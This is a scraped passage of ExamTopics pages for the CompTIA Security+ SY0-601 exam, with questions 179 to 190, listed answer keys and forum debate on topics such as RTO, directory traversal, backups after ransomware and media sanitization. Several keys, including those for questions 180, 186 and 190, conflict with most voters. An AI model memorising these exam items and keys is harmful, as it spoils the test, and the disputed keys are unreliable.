While Non-compliance with data sovereignty rules is an implication of having multiple cloud providers at DIFFERENT countries, this is not
specified in the question, besides, they are security solutions, which typically means they will not collect any kind of PII, PHI, SPI
upvoted 18 times

  ostralo 3 months, 3 weeks ago


I don't understand why this increases the attack surface.. Data has been collected by many different Security Solutions(they might have
different data centers in different regions or countries)
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


It creates more opportunity for an issue with many different solutions taking place
upvoted 1 times

  viksap Most Recent  1 month, 2 weeks ago


Selected Answer: A
Thinking of laws and regulations related to PII or PHI or may be GDPR but not sure
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
The immediate consequence of authorizing multiple security solutions to collect data from a company's cloud environment is an increase in the
attack surface. This is because each security solution that is authorized to collect data from the company's cloud environment adds another
potential entry point for attackers to exploit. This can make it more difficult to secure the cloud environment and can increase the risk of a
successful cyberattack.
upvoted 2 times

  HL2020 1 month, 4 weeks ago


Selected Answer: A
I'm not sure how this isn't A. You are letting other companies get to your data, this would pertain to data regulations.
upvoted 2 times

  BluEric 2 months, 3 weeks ago


Selected Answer: A
Since this is the company's cloud environment, it is likely a private cloud. Allowing others to access that data would mean they will have to follow
the data regulations, including GDPR, for example. So I am going with A, although this is a very annoying question.
upvoted 1 times

  rhocale 1 month, 2 weeks ago


this happens all the time its not any kind of a compliance issue and it never says it leaves the united states or where it (the main cloud
company) or the other businesses are if you are just looking at the question without taking it any further the answer must be D
upvoted 2 times

  Sony12 2 months, 4 weeks ago


Answer is C. Mandatory deployment of a SIEM solution to Log all relevant events and filter irrelevant data in one place.
upvoted 1 times

  J_Ark1 2 months, 4 weeks ago


slows down the system and opens it up to vulnerabilities i think
upvoted 1 times
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 316/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  Ashbash95 3 months ago


Selected Answer: C
Answer is C
upvoted 2 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: D
I agree with D
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 317/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #179 Topic 1

Which of the following explains why RTO is included in a BIA?

A. It identifies the amount of allowable downtime for an application or system.

B. It prioritizes risks so the organization can allocate resources appropriately.

C. It monetizes the loss of an asset and determines a break-even point for risk mitigation.

D. It informs the backup approach so that the organization can recover data to a known time.

Correct Answer: A

Community vote distribution


A (91%) 9%

  Jakalan7 Highly Voted  4 months, 2 weeks ago


Selected Answer: A
RTO = Recovery time objective. "The maximum tolerable length of time that a computer, system, network or application can be down after a
failure or disaster occurs." The answer is A.
upvoted 9 times

  lordguck 3 months ago


Most Recent 
A is right. A bia (business impact analysis) is part of a desaster recovery plan (drp) and documents the costs (not only monetary) of
business/service interruptions/failures. A bia is important for the desaster recovery strategy and documents RTO and RPO among other things.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


what's BIA?
upvoted 1 times

  Sir_Learnalot 3 months ago


it stands for business impact analysis
upvoted 2 times

  andrizo 3 months, 3 weeks ago


business incident analysis?
upvoted 1 times

  deeden 4 months, 1 week ago


Selected Answer: B
I think option B makes more sense in terms of BIA. Option A to me sounds like MTD, option C sounds like SLE or ALE, and option D sounds like
an RPO.
upvoted 1 times

  deeden 4 months, 1 week ago


Resource:
https://tandem.app/blog/what-is-the-difference-between-rpo-rto-mtd
upvoted 1 times

  deeden 4 months, 1 week ago


or I could be wrong, and option B could be more appropriate to the Incident Response process, rather than a BIA.
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
A is the right answer
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 318/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #180 Topic 1

A security analyst is reviewing web-application logs and finds the following log:

Which of the following attacks is being observed?

A. Directory traversal

B. XSS

C. CSRF

D. On-path attack

Correct Answer: C

Community vote distribution


A (93%) 7%

  Vishnuks Highly Voted  5 months ago


Answer is A (Directory Traversal)
upvoted 12 times

  stoneface 5 months ago


Agreed
upvoted 3 times

  securityexam101 Highly Voted  4 months, 4 weeks ago


Selected Answer: A
../../ directory traversal
1=1 SQL
so A
upvoted 9 times

  carpathia Most Recent  2 months, 3 weeks ago


Selected Answer: A
https://owasp.org/www-community/attacks/Path_Traversal
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: B
Cross-site scripting inserts a malicious script that appears to be part of the trusted website
upvoted 1 times

  zharis 3 months, 1 week ago


.....but directory traversal which involves threat actor submitting a request for a file outside the web servers root directory by submitting a path
to navigate to the parent directory looks more convincing given the URL included in the question.
upvoted 1 times

  ylatif 3 months, 3 weeks ago


Cross-Site Request Forgery (CSRF) attacks execute unauthorized actions on web applications, via an authenticated end-user’s connection.
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
It is A, directory traversal
upvoted 1 times

  Dachosenone 4 months, 3 weeks ago


Selected Answer: A
It is directory transversal
upvoted 2 times

  banditring 5 months ago


"A common symptom of this attack is the presence of a variation of the change to parent directory instruction (i.e., ../) in a URL, such as
..%c0%af or ..%5c." and it is showing this in this picture
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 319/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  derfnick 5 months ago


A Directory traversal
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 320/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #181 Topic 1

A security analyst is reviewing the vulnerability scan report for a web server following an incident. The vulnerability that was used to exploit the
server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely
cause?

A. Security patches were uninstalled due to user impact.

B. An adversary altered the vulnerability scan reports

C. A zero-day vulnerability was used to exploit the web server

D. The scan reported a false negative for the vulnerability

Correct Answer: A

Community vote distribution


A (83%) C (17%)

  Danalyst Highly Voted  4 months, 3 weeks ago


Selected Answer: A
A Zero day would not appear in historical scans, surely? how could a scan detect and record it before it was known.
upvoted 8 times

  Dachosenone Highly Voted  4 months, 3 weeks ago


Selected Answer: A
Dudes and dudettes, the question says "a patch is available for the vulnerability." So, answer A is the correct one.
upvoted 7 times

  Gino_Slim 3 months, 1 week ago


Appreciate ya dude
upvoted 1 times

  ronniehaang Most Recent  4 days, 3 hours ago


Selected Answer: A
The most likely cause is that the security patches were uninstalled due to user impact. A patch was available for the vulnerability that was used to
exploit the web server, but the patch was not applied, which allowed the attacker to exploit the server. This could have happened if the patch
was uninstalled due to compatibility issues or user complaints. It is important to keep systems updated and patched to prevent vulnerabilities
from being exploited.
upvoted 1 times

  alwaysrollin247 1 month, 1 week ago


Selected Answer: A
I was originally thinking zero day as well. However, this vunerability was present in historical scans reports. It would not be zero-day, someone
uninstalled the patches and ignored the vulnerability in the previous scans.
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
It is A, zero day wont pop up on a scan
upvoted 2 times

  Ay_ma 4 months, 3 weeks ago


Why isn't it D- False Negative Scan?
upvoted 2 times

  Jakalan7 4 months, 2 weeks ago


Because it's not a false negative, a false negative would indicate that a particular vulnerability was undiscovered on the scan, which was not
the case.
upvoted 4 times

  usam2021 4 months, 3 weeks ago


is "present in historical" vulnerability scan reports, and a patch is available for the vulnerability, so this is not zero-day, "A" makes more sense.
upvoted 3 times

  jgp 4 months, 4 weeks ago


If there is a patch, shouldn´t it be impossible for it to be a zero day attack? I think A makes more sense..
upvoted 5 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 321/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  enginne 5 months ago


Selected Answer: C
Previous zero day, today patches are available
upvoted 4 times

  Ribeiro19 4 months, 4 weeks ago


Guys its AAAAAA, look - The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is
available for the vulnerability
upvoted 3 times

  Ribeiro19 4 months, 4 weeks ago


A zero-day vulnerability is a vulnerability in a system or device that has been disclosed but is not yet patched. So if it is patched, is not a
zero-day
upvoted 3 times

  rhocale 1 month, 2 weeks ago


What is the difference between a zero-day vulnerability and a zero-day exploit?

The first term is zero-day vulnerability. This is when software has a flaw known to the developer, but the developer does not yet have a
patch ready to be released. If a patch is not released in time, nefarious actors can create a zero-day exploit -- our second term.

IE its looking for a vulnerability not an exploit


upvoted 1 times

  varun0 4 months, 4 weeks ago


Why are you assuming a patch didn't exist previously?
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 322/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #182 Topic 1

Which of the following is a known security risk associated with data archives that contain financial information?

A. Data can become a liability if archived longer than required by regulatory guidance.

B. Data must be archived off-site to avoid breaches and meet business requirements.

C. Companies are prohibited from providing archived data to e-discovery requests.

D. Unencrypted archives should be preserved as long as possible and encrypted.

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
https://www.ontrack.com/en-gb/blog/archiving-risk-security-risks-associated-with-tape-storage
upvoted 6 times

  ostralo 3 months, 3 weeks ago


if you've backed up customer databases onto tape, you could still have details for individuals who've long since stopped doing business with
you, despite the fact regulations may require you to delete this information. Keeping this data could create big problems for a company if a
breach occurs, so companies will need to find a way to ensure this information is permanently erased.
upvoted 2 times

  Orean Most Recent  2 months, 4 weeks ago


Selected Answer: A
B, C, and D describe regulatory requirements and practices, not RISKS as the question asks.
upvoted 1 times

  MarciaL 3 months, 2 weeks ago


B. Data must be archived off-site to avoid breaches and meet business requirements.
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
Agree with A
upvoted 1 times

  varun0 5 months ago


Selected Answer: A
Data minimization has to be done to decrease liability
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 323/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #183 Topic 1

Which of the following BEST describes the process of documenting who has access to evidence?

A. Order of volatility

B. Chain of custody

C. Non-repudiation

D. Admissibility

Correct Answer: B

Community vote distribution


B (100%)

  rodwave 2 months, 3 weeks ago


Selected Answer: B
Answer: Chain of custody

A chain of custody is a chronological paper trail documenting when, how, and by whom individual items of physical or electronic evidence—such
as cell phone logs—were collected, handled, analyzed, or otherwise controlled during an investigation.
========================
Helpful info

Order of Volatility -the sequence or order in which the digital evidence is collected. The order is maintained from highly volatile to less volatile
data. Highly volatile data resides in the memory, cache, or CPU registers, and it will be lost as soon as the power to the computer is turned off.

Non-repudiation - the assurance that the sender of information is provided with proof of delivery and the recipient is provided with proof of the
sender's identity, so neither can later deny having processed the information.

Admissibility - the quality of being acceptable or valid, especially as evidence in a court of law.
upvoted 3 times

  Knowledge33 3 months ago


Selected Answer: B
I think all responses are not correct, but the least false is reponse C (Chain of custody). The chain of custody is not limited to tell who has access
to why. It describes many things such as who had access, when, why, and so on. It's used for forensic investigation. The other responses are
totally false.
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: B
Chain of custody, B
upvoted 4 times

  gen2dee 4 months, 2 weeks ago


Chain of custody
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 324/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #184 Topic 1

A systems engineer wants to leverage a cloud-based architecture with low latency between network-connected devices that also reduces the
bandwidth that is required by performing analytics directly on the endpoints. Which of the following would BEST meet the requirements? (Choose
two.)

A. Private cloud

B. SaaS

C. Hybrid cloud

D. IaaS

E. DRaaS

F. Fog computing

Correct Answer: CF

Community vote distribution


CF (80%) AF (20%)

  ScottT Highly Voted  4 months, 3 weeks ago


CF - I had to look it up, so for those that didn't know; "Many people use the terms fog computing and edge computing interchangeably because
both involve bringing intelligence and processing closer to where the data is created" - https://www.techtarget.com/iotagenda/definition/fog-
computing-fogging
upvoted 10 times

  andrizo 3 months, 3 weeks ago


IOT location models
upvoted 2 times

  ronniehaang Most Recent  4 days, 3 hours ago


Selected Answer: AF
F. Fog computing and A. Private cloud would BEST meet the requirements.

Fog computing refers to a decentralized computing infrastructure where data and applications are processed at the edge of the network, closer
to the devices that generate or collect the data. This reduces the latency between devices, as data does not have to travel back and forth from a
central location.

A private cloud architecture provides dedicated, isolated network infrastructure that is operated solely for an organization. This allows for the
creation of a low latency network environment, as all the devices are connected to a private network that is managed by the organization. This
type of architecture also provides more control over security, which is a key concern for organizations that process sensitive data.
upvoted 1 times

  mick1 1 month, 1 week ago


How hybrid cloud can be low latency solution?
upvoted 2 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: CF
Fog computing and hybrid cloud would BEST meet the requirements. Fog computing is a distributed computing architecture that performs
analytics and other processing on the edge of a network, which reduces the amount of data that needs to be transmitted and the associated
bandwidth requirements. A hybrid cloud architecture combines the benefits of both public and private clouds, and allows for low-latency
communication between network-connected devices.
upvoted 4 times

  Tomtom11 3 months, 1 week ago


Fog computing is a distributed form of cloud computing, in
which the workload is performed on a distributed, decentralized
architecture. Originally developed by Cisco, fog computing moves some of
the work into the local space to manage latency issues, with the cloud being
less synchronous. In this form, it is similar to edge computing, which is
described in the next section.
upvoted 2 times

  Smaa2 3 months, 1 week ago


can someone explain why hybrid cloud?
upvoted 1 times

  G4ct756 3 months, 1 week ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 325/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

my interpretation. Since the engineer "wanted to leverage a cloud-base architecture" meaning currently network is on-prem and planning to
offload some system to cloud. Also with fog-computing, the company need to support IOT network on-prem.
upvoted 2 times

  Ranaer 2 weeks, 4 days ago


You can offload onto a private cloud aswell. I dont see why it has to be hybrid.
upvoted 1 times

  zaac22 2 months, 2 weeks ago


I agree
upvoted 1 times

  ostralo 3 months, 3 weeks ago


DRaaS - Disaster Recovery as a Service
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


This aint the one buddy
upvoted 4 times

  ostralo 3 months, 3 weeks ago


Fog computing is a decentralized computing infrastructure in which data, compute, storage and applications are located somewhere between
the data source and the cloud. Like edge computing, fog computing brings the advantages and power of the cloud closer to where data is
created and acted upon.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 326/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #185 Topic 1

Which of the following is a policy that provides a greater depth and breadth of knowledge across an organization?

A. Asset management policy

B. Separation of duties policy

C. Acceptable use policy

D. Job rotation policy

Correct Answer: D

Community vote distribution


D (100%)

  WondaByte Highly Voted  4 months, 3 weeks ago


Asset Management Policy looks more accurate for me .
upvoted 5 times

  Gino_Slim 3 months, 1 week ago


Gaining knowledge....by managing assets? Nah my boy that aint it
upvoted 8 times

  gen2dee 4 months, 2 weeks ago


the question was talking about gaining knowledge across the organization "gaining knowledge in every department" the only way that can be
done is through job rotation
upvoted 14 times

  mlonz Most Recent  6 days, 6 hours ago


Asset management is the process of tracking valuable assets throughout their life cycles. For example, organizations commonly implement
processes to track hardware such as servers, desktop computers, laptop computers, routers, and switches. An effective asset management
system can help reduce several vulnerabilities: •

=========================
Job rotation is a concept that has employees rotate through different jobs to learn the processes and procedures in each job. From a security
perspective, job rotation helps to prevent or expose dangerous shortcuts or even fraudulent activity. Employees might rotate through jobs
temporarily or permanently.
upvoted 2 times

  RonWonkers 4 months, 1 week ago


Selected Answer: D
Agree with D
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 327/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #186 Topic 1

A company is moving its retail website to a public cloud provider. The company wants to tokenize credit card data but not allow the cloud provider
to see the stored credit card information. Which of the following would BEST meet these objectives?

A. WAF

B. CASB

C. VPN

D. TLS

Correct Answer: D

Community vote distribution


B (88%) 13%

  RonWonkers Highly Voted  4 months, 1 week ago


Selected Answer: B
It seems like every question that is regarding cloud security has CASB as the answer
upvoted 12 times

  varun0 Highly Voted  5 months ago


Selected Answer: B
TLS cannot protect stored data, CASB can
upvoted 9 times

  ronniehaang Most Recent  4 days, 3 hours ago


Selected Answer: D
A. A WAF is used to secure web applications by monitoring and blocking malicious traffic. However, it does not offer a secure solution for storing
sensitive data like credit card information.
B. A CASB is a security solution that sits between a cloud provider and an organization, providing security and visibility into cloud usage.
However, it does not specifically address the requirement of tokenizing credit card data and not allowing the cloud provider to see the
information.
C. A VPN provides a secure connection to the cloud provider, but it does not solve the issue of credit card data security.
D. TLS (Transport Layer Security) - TLS is a protocol used to encrypt network traffic and ensure that the data is secure during transmission. This
solution is useful for ensuring the security of data in transit, but it does not provide a secure solution for storing sensitive information like credit
card data.
upvoted 1 times

  ronniehaang 4 days, 3 hours ago


The BEST solution to meet the objectives would be to use a combination of encryption and tokenization. Encryption can be used to encrypt
the credit card data both in transit and at rest. Tokenization can be used to replace the actual credit card data with a unique token that
represents the data, so the cloud provider will not have access to the actual credit card information.
upvoted 1 times

  Ranaer 2 weeks, 4 days ago


Selected Answer: D
I think people here miss the mark by a long shot. For tokenization you need to have the database where tokens are reffered to the actual CC
information. While the retail store can be hosted on the cloud, the CC-Token database should not be on the cloud. I think the only reasonable
solution that would provide confidentiality from the Client, trough the cloud and then to the company itself, where the check can be made is
trough TLS.
TBH I'm not entirely sure, since this is a confusing question, but I do not believe CASB to be the correct answer.
upvoted 2 times

  CIL15 1 week, 3 days ago


In order to tokenize credit card data and not allow the cloud provider to see the stored credit card information, the company would need to
handle the tokenization process on their own servers, before the data is sent to the cloud provider. This can be done by using a tokenization
server or service that is located within the company's own network or infrastructure, and is not accessible to the cloud provider. The tokenized
credit card data can then be securely transmitted to the cloud provider's servers via a secure protocol like TLS. This way, the cloud provider
will only ever see the tokenized data and not the original credit card data.
upvoted 3 times

  Sandon 1 week, 3 days ago


It's not TLS because the data is at rest.
upvoted 1 times

  Ranaer 5 days ago


The CC data, provided by the customer is absolutely NOT in rest. The data with CC info and its corresponding tokens is, but we are not
being asked about that. The way that makes the cloud provider not able to read the CC information is trough encryption/tunnel which TLS

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 328/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

provides.
upvoted 1 times
  ostralo 3 months, 3 weeks ago
CASBs have become a vital part of enterprise security, allowing businesses to safely use the cloud while protecting sensitive corporate data.
https://www.skyhighsecurity.com/en-us/cybersecurity-defined/what-is-a-casb.html
upvoted 3 times

  ramesh2022 4 months ago


A CASB's DLP capabilities help security teams protect sensitive information like financial data, proprietary data, credit card numbers, health
records, or social security numbers
upvoted 1 times

  stoneface 5 months ago


Not sure about this. TLS uses both asymmetric and symmetric encryption to protect the confidentiality and integrity of data-in-transit which will
not prevent to see the information at rest.

I think CASB will be more efficient as it also allows organizations to extend the reach of their security policies from their existing on-premises
infrastructure to the cloud and create new policies for cloud-specific context.

I hear you ...


upvoted 5 times

Question #187 Topic 1

A security analyst is tasked with defining the "something you are" factor of the company's MFA settings. Which of the following is BEST to use to
complete the configuration?

A. Gait analysis

B. Vein

C. Soft token

D. HMAC-based, one-time password

Correct Answer: B

Community vote distribution


B (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: B
Gait and vein are both 'something you are' factor.

But gait is also considered 'something you do'

Im going with vein here


upvoted 15 times

  k9_462 Highly Voted  5 months ago


Selected Answer: B
while gait and vein are both "something you are" a gait is easily altered and/or mimic'd.
Vein mapping in something like an iris scan is much harder to trick
upvoted 5 times

  creepyvirus Most Recent  1 month, 2 weeks ago


To define the "something you are" factor of the company's MFA settings, the security analyst can use "gait analysis".

Gait analysis involves using biometric sensors to analyze an individual's walking style and identify them based on their unique gait patterns. This
can be used as a factor in MFA to authenticate a user's identity.
upvoted 1 times

  Knowledge33 3 months ago


Selected Answer: B
Vein is the unique possible response. According to Comptia Security All in one book, Gait Analysis is never used for authentication. It's only used
to identify a suspect in a group of others, enabling tracking of individuals in a crowd.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 329/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #188 Topic 1

Which of the following processes will eliminate data using a method that will allow the storage device to be reused after the process is complete?

A. Pulverizing

B. Overwriting

C. Shredding

D. Degaussing

Correct Answer: B

Community vote distribution


B (92%) 8%

  mlonz 6 days, 6 hours ago


Degaussing. A degausser is a very powerful electronic magnet. Passing a disk through a degaussing field renders the data on tape and magnetic
disk drives unreadable.
upvoted 1 times

  asum 2 weeks, 4 days ago


Selected Answer: B
you cannot reuse a hard drive once it has been degaussed. This is because the degaussing process not only removes all the data, but it also
removes the start up files. As such, a degaussed hard drive will not boot up.
upvoted 2 times

  Ranaer 1 month, 2 weeks ago


Selected Answer: B
The answer is B. Overwriting.
The reason degaussing wont work, is because when this process is used, it erases EVERYTHING on the disk, including the disk startup files, the
servo positioning and possibly others that I'm not aware of. The servo positioning information is put in from the manufacturer itself, in the factory.
There is no way to restore that data, which renders the disk COMPLETELY unusable.
upvoted 1 times

  viksap 1 month, 2 weeks ago


Selected Answer: B
DEGAUSSING: doesn’t allow reuse and same as option A & C. So the correct answer is B
upvoted 1 times

  Nome02 1 month, 3 weeks ago


Correct is D. Please read the question carefully. It is asking a method to eliminate the data for repurpose.
upvoted 1 times

  keak 2 months ago


Selected Answer: B
Overwriting or Clearing: Preparing media for reuse and ensuring data cannot be recovered using traditional recovery tools.
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: B
B is the only one giving the option to reuse the device afterwards. Degaussing would not give you the option for reuse
upvoted 1 times

  lordguck 3 months ago


B: To make it short, good luck degaussing a SSD.
upvoted 1 times

  Funt 3 months, 2 weeks ago


If it was actually degaussed by running it through an electromagnet then it's toast. The servo platter will have been erased, leaving no head
positioning information. The servo tracks can only be written at the factory.
upvoted 2 times

  comeragh 4 months ago


Selected Answer: B
Agree with B here
upvoted 1 times

  varun0 4 months, 4 weeks ago


https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 330/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: B
Overwriting, disregard my other comment. Overwriting allows disk to be reused
upvoted 4 times

  varun0 5 months ago


Selected Answer: D
I think its D because they said eliminating data not overwriting.
upvoted 1 times

  varun0 5 months ago


Simply put, degaussers rearrange the magnetic field on a hard drive to destroy or randomize the data. This process either destroys the data
completely or makes it unrecognizable.
upvoted 3 times

  anonimouse2 4 months, 4 weeks ago


You cannot reuse a drive that has been degaussed. It's B.
upvoted 4 times

  varun0 4 months, 4 weeks ago


Disregard this, its overwriting. Degaussers don't allow disk to be reused
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 331/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #189 Topic 1

A user's account is constantly being locked out. Upon further review, a security analyst found the following in the SIEM:

Which of the following describes what is occurring?

A. An attacker is utilizing a password-spraying attack against the account.

B. An attacker is utilizing a dictionary attack against the account.

C. An attacker is utilizing a brute-force attack against the account.

D. An attacker is utilizing a rainbow table attack against the account.

Correct Answer: C

Community vote distribution


C (100%)

  FMMIR 2 months, 1 week ago


Selected Answer: C
A simple brute-force attack uses automation and scripts to guess passwords. Typical brute-force attacks make a few hundred guesses every
second. Simple passwords, such as those lacking a mix of upper- and lowercase letters and those using common expressions like ‘123456’ or
‘password,’ can be cracked in minutes. Look at the time of attacks performed.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Why comptia, why
upvoted 1 times

  abrilo 3 months, 4 weeks ago


if it was brute force, shouldn't it be different passwords shown on the SIEM?
upvoted 2 times

  alayeluwa 3 months, 3 weeks ago


Look closely lol, the numbers in the password are changing.
upvoted 4 times

  db97 4 months, 1 week ago


Dictionary attack -> known and common words being used
Spraying password -> will try top 3/5 passwords on multiple user accounts
Brute Force -> will try any password combination, resulting with a lock out most of the time
upvoted 4 times

  RonWonkers 4 months, 1 week ago


Selected Answer: C
Agree with Brute Force
upvoted 1 times

  passmemo 4 months, 2 weeks ago


Selected Answer: C
Password spraying is an attack that attempts to access a large number of accounts (usernames) with a few commonly used passwords.
Traditional brute-force attacks attempt to gain unauthorized access to a single account by guessing the password.
upvoted 4 times

  comeragh 4 months, 3 weeks ago


Selected Answer: C
Brute Force - locked out account/1 account several password attempts to me points to Brute Force
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 332/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #190 Topic 1

A web server has been compromised due to a ransomware attack. Further investigation reveals the ransomware has been in the server for the
past 72 hours. The systems administrator needs to get the services back up as soon as possible. Which of the following should the administrator
use to restore services to a secure state?

A. The last incremental backup that was conducted 72 hours ago

B. The last known-good configuration

C. The last full backup that was conducted seven days ago

D. The baseline OS configuration

Correct Answer: A

Community vote distribution


C (54%) A (28%) B (19%)

  FQ Highly Voted  4 months, 3 weeks ago


Selected Answer: A
B and D affects the configuration, not the users data.
C is a full back up which takes time, the question asks for the best option to get the service up as soon as possible.
Answer is A.
upvoted 13 times

  zzzfox 4 months, 3 weeks ago


If it’s ransomeware, all data should be got encrypted. incremental backup won’t help you to get all your data back. I would go answer c
upvoted 12 times

  alwaysrollin247 1 month, 1 week ago


So restore back to a point where the ransomware was likely still on the system? I think not. The question also states "restore data to a secure
state" not as soon as possible. The answer is C.
upvoted 3 times

  ostralo 3 months, 3 weeks ago


I second zzzfox's opinion. any incremental backups without a full backup are meaningless.

An incremental backup is a backup type that only copies data that has been changed or created since the previous backup activity was
conducted.

Since all the data has gone, we need a full backup + any available incremental backups or differential backups. Either way, a full backup is a
must.
upvoted 2 times

  comeragh Highly Voted  4 months, 3 weeks ago


Selected Answer: C
I would go with C here. Reason - 7 days ago is more than 72 hours ago and possibly the last good backup taken. Just my thoughts. Open for
discussion...
upvoted 10 times

  ronniehaang Most Recent  4 days, 2 hours ago


Selected Answer: C
The administrator should use the last full backup that was conducted seven days ago to restore services to a secure state. The reason for this is
that full backups contain a complete copy of all data, whereas incremental backups only contain changes made since the last backup. If the
ransomware has been present for 72 hours, it is possible that it has encrypted or modified data during that time. Using the last full backup from
before the infection will ensure that all data and configurations are restored to a secure state, free of any ransomware.
upvoted 2 times

  ronniehaang 4 days, 2 hours ago


The best option to restore services to a secure state would be to use the last full backup that was conducted seven days ago. This ensures
that the compromised files and data from the past 72 hours are not included in the restored version, thereby reducing the risk of the
ransomware spreading again. The administrator should also investigate the cause of the compromise to ensure that it does not happen again
in the future.
upvoted 1 times

  6and0 1 month, 2 weeks ago


Selected Answer: C
A -No - The last incremental backup that was conducted 72 hours ago - If we can say the infection happened 72 hours ago then a backup from
72 hours ago does us no good.
B - No - The last known-good configuration - This would reverse all non-security-related changes made to the Registry during the last session..
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 333/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Thus the system may still be infected


C - Yes! -The last full backup that was conducted seven days ago
D - No - The baseline OS configuration - Would remove the possibility of the system being infected but would not be the quickest method
upvoted 2 times
  StripedGiraffe 1 month, 2 weeks ago
from iosafe.com

Full Backup
This is the most time-consuming backup of all methods to perform and may put a strain on your network if the backup is occurring on the
network. But it's also the quickest to restore from because all the files you need are contained in the same backup set.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
The best option for the administrator to restore services to a secure state would be to use the last known-good configuration. This will allow the
administrator to revert the system to a known good state before the ransomware was able to compromise the server. Option A, the last
incremental backup that was conducted 72 hours ago, may still contain the ransomware, since it was conducted while the ransomware was
already present on the server. Option C, the last full backup that was conducted seven days ago, may not have the most up-to-date information
and may not be able to restore the system to a usable state. Option D, the baseline OS configuration, may not include any customizations or
configurations that have been made to the server since it was initially set up
upvoted 3 times

  smudder 1 month, 3 weeks ago


Selected Answer: B
The best option in this scenario would be to restore services using the last known-good configuration. This will allow the systems administrator to
bring the services back online quickly and securely, without having to worry about any potential lingering effects of the ransomware. By restoring
services using a known-good configuration, the administrator can be confident that the services will be running in a secure and stable state.

It is important to note that in order to prevent future ransomware attacks, the administrator will need to take additional steps to secure the server
and prevent similar attacks from happening again. This might include implementing additional security measures, such as antivirus software,
firewalls, and regular backups.
upvoted 1 times

  Nome02 2 months ago


Correct is A. Very sad that many folks even don't know what is incremental backup is. Incremental automatically go back to the good full backup
and after the full backup, just apply the delta till incremental backup. If we go for option C, then we are losing 4 days of data.
upvoted 2 times

  Nome02 2 months ago


Correct is A. Very sad that many folks even don't know what is incremental backup is. Incremental automatically go back to the good full backup
and after the full backup, just apply the delta till incremental backup. If we go for option C, then we are losing 4 days of data.
upvoted 3 times

  babyzilla 2 months, 2 weeks ago


Selected Answer: C
B and C are out because it deals with configs. Even though A could work, I would feel more comfortable with C as it goes further back in time
with a full backup. Who actually knows how long the remnants of the attack have been on the system.
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: C
You´ll need a full backup to recover from a ransomware attack. As the last full backup is also older than the the time the ransomware was planted
on the server, you should be fine with thsi backup
upvoted 5 times

  J_Ark1 2 months, 4 weeks ago


Selected Answer: C
It requires an attacker to place the ransomware in the system in the first place so they placed it in the system 72hours ago, hence they exploited
